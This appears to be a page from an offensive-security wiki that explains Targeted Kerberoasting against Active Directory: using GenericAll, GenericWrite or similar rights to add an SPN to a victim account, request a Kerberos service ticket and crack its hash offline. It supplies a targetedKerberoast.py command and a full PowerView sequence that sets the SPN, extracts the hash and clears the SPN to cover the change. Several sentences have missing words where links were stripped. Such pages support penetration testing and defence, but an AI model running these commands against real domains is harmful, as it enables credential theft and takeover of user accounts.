Targeted Kerberoasting

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the group usually has those permissions.

The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to . This technique is called Targeted Kerberoasting.

From UNIX-like systems, this can be done with (Python)

targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD

From Windows machines, this can be achieved with and ( module).

# Make sur that the target account has no SPN
Get-DomainUser 'victimuser' | Select serviceprincipalname

# Set the SPN
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

# Obtain a kerberoast hash
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl

# Clear the SPNs of the target account
$User | Select serviceprincipalname
Set-DomainObject -Identity victimuser -Clear serviceprincipalname

Once the Kerberoast hash is obtained, it can possibly be to recover the account's password if the password used is weak enough.

PreviousForceChangePassword NextReadLAPSPassword

Last updated 1 year ago

Was this helpful?